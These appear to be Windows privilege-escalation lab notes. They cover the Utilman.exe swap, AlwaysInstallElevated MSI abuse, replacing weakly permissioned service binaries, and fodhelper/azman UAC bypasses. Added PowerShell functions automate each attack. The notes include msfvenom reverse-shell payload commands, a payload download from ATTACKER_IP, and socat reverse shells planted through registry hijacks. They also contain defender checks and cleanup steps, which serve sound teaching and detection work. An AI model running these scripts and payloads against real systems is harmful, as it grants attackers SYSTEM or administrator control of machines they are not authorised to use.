CyberNotes

Escalation

Common ways for an attacker to gain and execute commands with elevated privileges.

Utilman.exe

Utilman is a built-in Windows application that provides the Ease of Access options on the lock screen.

Because Utilman is started by the logon session with SYSTEM privileges, replacing the original binary with any payload we like gives us SYSTEM. This only works because our user holds SeTakeOwnershipPrivilege (check with whoami /priv): that privilege lets us take ownership of any file, including one under System32, and the owner can always rewrite the file's permissions, so replacing it is trivial.

  1. Start by taking ownership of the binary with the following command
C:\> takeown /f C:\Windows\System32\Utilman.exe
SUCCESS: The file (or folder): "C:\Windows\System32\Utilman.exe" now owned by user "WINPRIVESC2\thmtakeownership".

Being the owner of a file doesn't mean you have any access rights over it, but as owner you can assign yourself whatever rights you need.

  2. Give your user full control over Utilman.exe with the following command
C:\> icacls C:\Windows\System32\Utilman.exe /grant THMTakeOwnership:F
processed file: Utilman.exe
Successfully processed 1 files; Failed processing 0 files
  3. Replace Utilman.exe with a copy of cmd.exe (back up the original first if you intend to restore it)
C:\Windows\System32\> copy cmd.exe utilman.exe
        1 file(s) copied.
  4. Lock the screen from the Start menu and click the "Ease of Access" button

Since we replaced Utilman.exe with a copy of cmd.exe, the "Ease of Access" button now opens a command prompt running as SYSTEM on the lock screen.
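The same four steps as a PowerShell script, added here as an example (not part of the original notes): it checks the prerequisite privilege first, keeps a backup so the swap can be undone, and adds the check a defender would run. It assumes the user holds SeTakeOwnershipPrivilege, as the thmtakeownership user above does; the function names and the backup path are chosen for this example. The defender-side function goes beyond Utilman and inspects the other Ease of Access helpers that can be swapped the same way.

```powershell
# Added example, not from the original notes. Assumes SeTakeOwnershipPrivilege;
# function names and the backup location are this example's own choices.

function Test-TakeOwnershipPrivilege {
    # takeown on a System32 file only works if the token carries this
    # privilege; a Disabled state is fine, takeown enables it itself.
    $privs = whoami /priv /fo csv | ConvertFrom-Csv
    return [bool]($privs | Where-Object { $_.'Privilege Name' -eq 'SeTakeOwnershipPrivilege' })
}

function Invoke-UtilmanSwap {
    param(
        [string]$Payload = "$env:SystemRoot\System32\cmd.exe",
        [string]$Backup  = "$env:TEMP\Utilman.exe.bak"   # assumed backup location
    )
    $target = "$env:SystemRoot\System32\Utilman.exe"
    if (-not (Test-TakeOwnershipPrivilege)) {
        throw 'SeTakeOwnershipPrivilege missing: takeown on System32 will fail.'
    }
    $me = whoami                                   # DOMAIN\user, as icacls expects
    takeown /f $target | Out-Null                  # step 1: become the owner
    icacls $target /grant "${me}:F" | Out-Null     # step 2: the owner may rewrite the DACL
    Copy-Item -Path $target  -Destination $Backup -Force   # keep the original
    Copy-Item -Path $Payload -Destination $target -Force   # step 3: drop the payload
    Write-Host 'Done. Lock the screen and press the Ease of Access button (step 4).'
}

function Restore-Utilman {
    param([string]$Backup = "$env:TEMP\Utilman.exe.bak")
    $target = "$env:SystemRoot\System32\Utilman.exe"
    Copy-Item -Path $Backup -Destination $target -Force
    icacls $target /remove:g (whoami) | Out-Null   # drop the ACE added above
    # Handing ownership back to TrustedInstaller needs SeRestorePrivilege, which
    # the SYSTEM shell obtained through Utilman has (assumption about where this
    # is run from); otherwise the command just fails and the ACE change remains.
    icacls $target /setowner 'NT SERVICE\TrustedInstaller' 2>$null | Out-Null
}

function Test-AccessibilityBinaries {
    # Defender side. A swapped helper shows up as an invalid signature, an owner
    # other than TrustedInstaller, or a file whose hash equals cmd.exe.
    $cmdHash = (Get-FileHash "$env:SystemRoot\System32\cmd.exe").Hash
    foreach ($name in 'Utilman.exe','sethc.exe','osk.exe','Magnify.exe','Narrator.exe','DisplaySwitch.exe') {
        $path = "$env:SystemRoot\System32\$name"
        if (-not (Test-Path $path)) { continue }
        $findings = @()
        $sig = Get-AuthenticodeSignature $path      # catalog-signed files report Valid too
        if ($sig.Status -ne 'Valid') { $findings += "signature $($sig.Status)" }
        $owner = (Get-Acl $path).Owner
        if ($owner -ne 'NT SERVICE\TrustedInstaller') { $findings += "owner $owner" }
        if ((Get-FileHash $path).Hash -eq $cmdHash) { $findings += 'hash matches cmd.exe' }
        if ($findings) { [pscustomobject]@{ File = $name; Findings = ($findings -join '; ') } }
    }
}
```

Run Invoke-UtilmanSwap as the low-privileged user, then lock the screen; run Restore-Utilman from the SYSTEM prompt when finished. Test-AccessibilityBinaries prints nothing on a clean host and one line per tampered helper otherwise.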

AlwaysInstallElevated

Windows Installer packages (.msi) are used to install applications and normally run with the privilege level of the user who starts them. The AlwaysInstallElevated policy changes that: when it is enabled, msiexec installs any package with SYSTEM privileges regardless of who launched it, so an unprivileged user who can run a malicious MSI gets an elevated shell.

The policy is only in effect when the value AlwaysInstallElevated (REG_DWORD, 1) exists under both the per-user and the machine policy key. You can query them from the command line with the commands below.

C:\> reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer
C:\> reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer

Both values must be 1; if either is missing or 0, msiexec runs with the caller's privileges and this route is not available.

You can generate a malicious .msi file with msfvenom:

msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKING_MACHINE_IP LPORT=LOCAL_PORT -f msi -o malicious.msi

Transfer the file to the target, start a listener on ATTACKING_MACHINE_IP:LOCAL_PORT, and run the installer quietly with the command below (the reverse shell connects back as SYSTEM):

C:\> msiexec /quiet /qn /i C:\Windows\Temp\malicious.msi
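The check the two reg query commands perform by hand, together with the launch and the remediation, as an added PowerShell example (not from the original notes). Only the AlwaysInstallElevated value itself counts, and it must be 1 under both keys; the function names are this example's own.

```powershell
# Added example, not from the original notes. Function names are ours.

$InstallerPolicyKeys = @(
    'HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer',
    'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer'
)

function Test-AlwaysInstallElevated {
    $rows = foreach ($k in $InstallerPolicyKeys) {
        # A missing key or value reads as $null, which is treated as "not set"
        $v = (Get-ItemProperty -Path $k -Name AlwaysInstallElevated -ErrorAction SilentlyContinue).AlwaysInstallElevated
        [pscustomobject]@{ Key = $k; AlwaysInstallElevated = $v; Enabled = ($v -eq 1) }
    }
    $rows | Format-Table -AutoSize | Out-String | Write-Host
    # Exploitable only when *both* hives say 1
    return -not ($rows.Enabled -contains $false)
}

function Invoke-ElevatedMsi {
    param([Parameter(Mandatory)][string]$MsiPath)
    if (-not (Test-AlwaysInstallElevated)) { throw 'AlwaysInstallElevated is not set to 1 in both hives.' }
    if (-not (Test-Path -LiteralPath $MsiPath)) { throw "MSI not found: $MsiPath" }
    # /i install, /qn no UI. Not waited on, so the call returns whether or not
    # the package's payload is still running.
    Start-Process -FilePath msiexec.exe -ArgumentList "/i `"$MsiPath`" /qn"
}

function Disable-AlwaysInstallElevated {
    # Remediation: 0 is the secure value (writing HKLM needs an elevated shell)
    foreach ($k in $InstallerPolicyKeys) {
        if (Test-Path $k) { Set-ItemProperty -Path $k -Name AlwaysInstallElevated -Value 0 -Type DWord }
    }
}
```

Invoke-ElevatedMsi C:\Windows\Temp\malicious.msi refuses to run unless both values are 1, which saves a wasted upload when only one of them is set.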

Windows Services

If the executable associated with a service has weak permissions that let an attacker modify or replace it, the attacker trivially gains the privileges of the account the service runs as (often LocalSystem), provided they can also get the service restarted.

  1. Query the service configuration using sc; note BINARY_PATH_NAME (the file to check) and SERVICE_START_NAME (the account the payload will run as)
C:\> sc qc WindowsScheduler 
  2. Check the permissions on the executable; a write, modify or full-control entry for your user, or for a group you belong to such as Everyone, Users or Authenticated Users, is enough
C:\Users\thm-unpriv>icacls C:\PROGRA~2\SYSTEM~1\WService.exe
  3. Generate an exe-service payload using msfvenom and serve it through a Python web server (a plain exe would be killed by the Service Control Manager because it never answers the service start request; exe-service wraps the payload in that handshake)
user@attackerpc$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4445 -f exe-service -o rev-svc.exe

We can then pull the payload from PowerShell with the following command (wget is an alias of Invoke-WebRequest here):

wget http://ATTACKER_IP:8000/rev-svc.exe -O rev-svc.exe

Once the payload is on the Windows host, we replace the service executable with it, keeping the original as a backup.

C:\> cd C:\PROGRA~2\SYSTEM~1\
C:\PROGRA~2\SYSTEM~1> move WService.exe WService.exe.bkp
        1 file(s) moved.
C:\PROGRA~2\SYSTEM~1> move C:\Users\unpriviledged\rev-svc.exe WService.exe
        1 file(s) moved.
C:\PROGRA~2\SYSTEM~1> icacls WService.exe /grant Everyone:F
        Successfully processed 1 files.

Finally, restart the service so the payload is executed under the service account. This requires stop and start rights on the service (sc sdshow shows its security descriptor); if you lack them and the service starts automatically, a reboot also works.

C:\> sc stop windowsscheduler
C:\> sc start windowsscheduler
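The sc qc and icacls steps above check one service by hand. As an added example (not part of the original notes), the script below generalizes that check across every installed service: it extracts the binary path (quoted or not), resolves the identities the current token carries, and reports any service whose executable or containing directory grants write or delete access to one of them, together with the account the service runs as. The function names are this example's own.

```powershell
# Added example, not from the original notes. Function names are ours.

function Get-ServiceBinaryPath {
    param([string]$PathName)
    # "C:\Program Files\X\svc.exe" -arg  -> take the quoted part
    # C:\Program Files\X\svc.exe -arg    -> unquoted: take up to the first .exe
    if ($PathName -match '^\s*"([^"]+)"') { return $Matches[1] }
    if ($PathName -match '^\s*(.+?\.exe)') { return $Matches[1] }
    return $PathName.Trim()
}

function Find-WritableServiceBinaries {
    # Every identity the token carries: the user plus all groups (Everyone,
    # BUILTIN\Users, NT AUTHORITY\Authenticated Users, ...). -contains is
    # case-insensitive, so DOMAIN\user casing does not matter.
    $ids = @(whoami) + @((whoami /groups /fo csv | ConvertFrom-Csv).'Group Name')
    $writeBits = [int][System.Security.AccessControl.FileSystemRights]'Write, Delete'
    $genericWA = 0x50000000   # GENERIC_WRITE | GENERIC_ALL, which Get-Acl does not expand

    foreach ($svc in Get-CimInstance -ClassName Win32_Service) {
        if (-not $svc.PathName) { continue }
        $exe = Get-ServiceBinaryPath $svc.PathName
        if (-not (Test-Path -LiteralPath $exe)) { continue }
        # A writable file can be overwritten; a writable directory lets us
        # rename the file and drop ours in, which is what the move steps above do.
        foreach ($target in @($exe, (Split-Path -Path $exe -Parent))) {
            try { $acl = Get-Acl -LiteralPath $target -ErrorAction Stop } catch { continue }
            $hits = $acl.Access | Where-Object {
                $_.AccessControlType -eq 'Allow' -and
                $ids -contains $_.IdentityReference.Value -and
                ((([int]$_.FileSystemRights) -band $writeBits) -ne 0 -or
                 (([int]$_.FileSystemRights) -band $genericWA) -ne 0)
            }
            if ($hits) {
                [pscustomobject]@{
                    Service  = $svc.Name
                    RunsAs   = $svc.StartName
                    State    = $svc.State
                    Writable = $target
                    Via      = (($hits.IdentityReference.Value | Select-Object -Unique) -join ', ')
                }
            }
        }
    }
}

Find-WritableServiceBinaries | Format-Table -AutoSize
```

Services that run as LocalSystem with a writable binary are the targets; a hit on the directory only means the original must be moved aside rather than overwritten, as in the steps above.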

AutoElevate

Some executables auto-elevate, that is, they run at high integrity without a UAC prompt when started by a member of the Administrators group. This applies to most of the Control Panel's functionality and to some executables shipped with Windows. For an application to auto-elevate:

  • The executable must be signed by Microsoft (the Windows Publisher signer)
  • The executable must be located in a trusted directory, such as %SystemRoot%\System32\ or %ProgramFiles%\

Executable files (.exe) must also declare the autoElevate element in their manifests. To check a file's manifest, we can use sigcheck, a tool provided as part of the Sysinternals suite. All of this only matters when UAC is not set to "Always notify"; at that level every elevation prompts and these bypasses fail.
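A way to find the candidates on a host without running sigcheck on each file, added here as an example (not part of the original notes): the manifest is stored as plain text in the executable's resource section, so a raw substring search for the autoElevate element finds it, and Get-AuthenticodeSignature covers the signer condition. The second function reads the UAC setting that decides whether auto-elevation is honoured at all. Function names are this example's own.

```powershell
# Added example, not from the original notes. Function names are ours.

function Find-AutoElevateBinaries {
    param([string]$Directory = "$env:SystemRoot\System32")
    # The manifest lives as plain text in the RT_MANIFEST resource, so a raw
    # substring search works without a PE parser (-match is case-insensitive).
    $pattern = '<autoElevate[^>]*>\s*true\s*</autoElevate>'
    foreach ($f in Get-ChildItem -Path $Directory -Filter *.exe -File -ErrorAction SilentlyContinue) {
        $text = [Text.Encoding]::ASCII.GetString([IO.File]::ReadAllBytes($f.FullName))
        if ($text -notmatch $pattern) { continue }
        $sig = Get-AuthenticodeSignature -FilePath $f.FullName   # handles catalog-signed files
        $subject = if ($sig.SignerCertificate) { $sig.SignerCertificate.Subject } else { '' }
        [pscustomobject]@{
            File      = $f.Name
            Signature = $sig.Status
            Microsoft = ($subject -like '*Microsoft*')   # all three conditions must hold
        }
    }
}

function Get-UacLevel {
    # ConsentPromptBehaviorAdmin: 5 (default) prompts only for non-Windows
    # binaries, so autoElevate binaries elevate silently; 2 is "Always notify",
    # where everything prompts; 0 elevates everything without prompting.
    $p = Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
    [pscustomobject]@{
        UacEnabled                 = ($p.EnableLUA -eq 1)
        ConsentPromptBehaviorAdmin = $p.ConsentPromptBehaviorAdmin
        SilentAutoElevate          = ($p.ConsentPromptBehaviorAdmin -in 0, 5)
    }
}

Get-UacLevel
Find-AutoElevateBinaries | Where-Object { $_.Microsoft -and $_.Signature -eq 'Valid' } | Format-Table -AutoSize
```

The filtered list is the set of binaries worth examining for a bypass on that host; fodhelper.exe and mmc.exe appear in it on default installations.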

azman.msc

Open the Run prompt, type "azman.msc" and press OK. The snap-in is loaded by mmc.exe, which auto-elevates, so the console runs with elevated privileges.

To turn that into a shell, we abuse the application's help feature.

  1. In the navigation menu, select Help > Help Topics
  2. Right click anywhere on the help article and select View Source

This spawns a Notepad process, inheriting the elevated token, which we can use to launch a shell. Go to File > Open, select "All Files" in the file-type dropdown, browse to C:\Windows\System32 and locate cmd.exe.

Right-click it and select Open. You now have a command prompt with elevated access.

Fodhelper

Fodhelper.exe is another auto-elevating binary. Before using it, check that your user is a member of the Administrators group and is currently running with a medium integrity token (otherwise there is no UAC boundary to bypass):

C:\Windows\system32>whoami
myserver\attacker
C:\Windows\system32>net user attacker | find "Local Group"
Local Group Memberships      *Administrators       *Users                
C:\Windows\system32>whoami /groups | find "Label"
Mandatory Label\Medium Mandatory Level                        Label            S-1-16-8192

Fodhelper opens the ms-settings: protocol and looks its handler up under HKCU\Software\Classes first, a location we can write to without elevation. We set the registry values that associate the ms-settings class with our command (here a socat reverse shell); the empty DelegateExecute value makes the shell execute the command line in the default value.

C:\> set REG_KEY=HKCU\Software\Classes\ms-settings\Shell\Open\command
C:\> set CMD="powershell -windowstyle hidden C:\Tools\socat\socat.exe TCP:<attacker_ip>:4444 EXEC:cmd.exe,pipes"
C:\> reg add %REG_KEY% /v "DelegateExecute" /d "" /f
The operation completed successfully.
C:\> reg add %REG_KEY% /d %CMD% /f
The operation completed successfully.
 
C:\> fodhelper.exe

A second variant uses a CurVer indirection: ms-settings is pointed at a custom ProgID (.thm) whose Shell\Open\command holds the payload, so nothing is written under the ms-settings command key itself.

C:\> set CMD="powershell -windowstyle hidden C:\Tools\socat\socat.exe TCP:<attacker_ip>:4445 EXEC:cmd.exe,pipes"
 
C:\> reg add "HKCU\Software\Classes\.thm\Shell\Open\command" /d %CMD% /f 
The operation completed successfully.
 
C:\> reg add "HKCU\Software\Classes\ms-settings\CurVer" /d ".thm" /f 
The operation completed successfully. 
 
C:\> fodhelper.exe

Whichever variant was used, remove the planted keys afterwards; an ms-settings ProgID under a user's Classes hive is a well-known indicator of this bypass:

reg delete "HKCU\Software\Classes\.thm\" /f
reg delete "HKCU\Software\Classes\ms-settings\" /f
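Both fodhelper variants above in one PowerShell function with guaranteed cleanup, followed by the check a defender would run, added here as an example (not part of the original notes). The command string is whatever the caller passes (the notes use a socat reverse shell); the ProgID name .thm comes from the notes; the function names and the wait time are this example's own choices.

```powershell
# Added example, not from the original notes. Function names are ours.

function Invoke-FodhelperBypass {
    param(
        [Parameter(Mandatory)][string]$Command,
        [switch]$UseCurVer,           # second variant: ms-settings\CurVer -> custom ProgID
        [string]$ProgId = '.thm',
        [int]$WaitSeconds = 5
    )
    $classes = 'HKCU:\Software\Classes'
    $ms      = "$classes\ms-settings"
    try {
        if ($UseCurVer) {
            # Payload sits under our own ProgID; ms-settings only points at it
            New-Item -Path "$classes\$ProgId\Shell\Open\command" -Value $Command -Force | Out-Null
            New-Item -Path "$ms\CurVer" -Value $ProgId -Force | Out-Null
        } else {
            $cmdKey = New-Item -Path "$ms\Shell\Open\command" -Value $Command -Force
            # Empty DelegateExecute makes the shell run the (default) command line
            Set-ItemProperty -Path $cmdKey.PSPath -Name DelegateExecute -Value ''
        }
        # fodhelper.exe auto-elevates and resolves ms-settings: via HKCU first
        Start-Process -FilePath "$env:SystemRoot\System32\fodhelper.exe"
        Start-Sleep -Seconds $WaitSeconds       # let the elevated handler start $Command
    } finally {
        # Always remove the keys: a user-hive ms-settings ProgID is a known IOC
        Remove-Item -Path $ms -Recurse -Force -ErrorAction SilentlyContinue
        Remove-Item -Path "$classes\$ProgId" -Recurse -Force -ErrorAction SilentlyContinue
    }
}

function Test-FodhelperArtifacts {
    # Defender side: walk every loaded user hive (reading other users' hives
    # needs admin; unreadable ones are skipped) and report any ms-settings
    # override, whether set directly or through CurVer.
    foreach ($hive in Get-ChildItem Registry::HKEY_USERS | Where-Object { $_.PSChildName -match '^S-1-5-21-[\d-]+$' }) {
        $classes = "Registry::$($hive.Name)\Software\Classes"
        $ms = "$classes\ms-settings"
        if (-not (Test-Path $ms)) { continue }
        $direct = (Get-ItemProperty -Path "$ms\Shell\Open\command" -ErrorAction SilentlyContinue).'(default)'
        $curVer = (Get-ItemProperty -Path "$ms\CurVer" -ErrorAction SilentlyContinue).'(default)'
        $viaCur = if ($curVer) { (Get-ItemProperty -Path "$classes\$curVer\Shell\Open\command" -ErrorAction SilentlyContinue).'(default)' }
        [pscustomobject]@{ UserSid = $hive.PSChildName; Command = $direct; CurVer = $curVer; CurVerCommand = $viaCur }
    }
}
```

Invoke-FodhelperBypass -Command 'powershell -windowstyle hidden C:\Tools\socat\socat.exe TCP:<attacker_ip>:4444 EXEC:cmd.exe,pipes' -UseCurVer reproduces the second variant; Test-FodhelperArtifacts returns nothing on a clean host, since no legitimate software creates an ms-settings ProgID under a user's Classes hive.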

WinPEAS

WinPEAS is a tool (an executable, with a batch-script variant) that searches for possible privilege escalation paths on Windows hosts.

PrivescCheck

This PowerShell script aims to identify Local Privilege Escalation (LPE) vulnerabilities that are usually due to Windows configuration issues or bad practices. It also gathers information useful for exploitation and post-exploitation tasks.

WES-NG

WES-NG (Windows Exploit Suggester, Next Generation) runs on the attacker's machine and takes the output of the target's systeminfo utility as input; from the OS version and installed patches it lists the vulnerabilities the OS is affected by, along with known exploits for them.
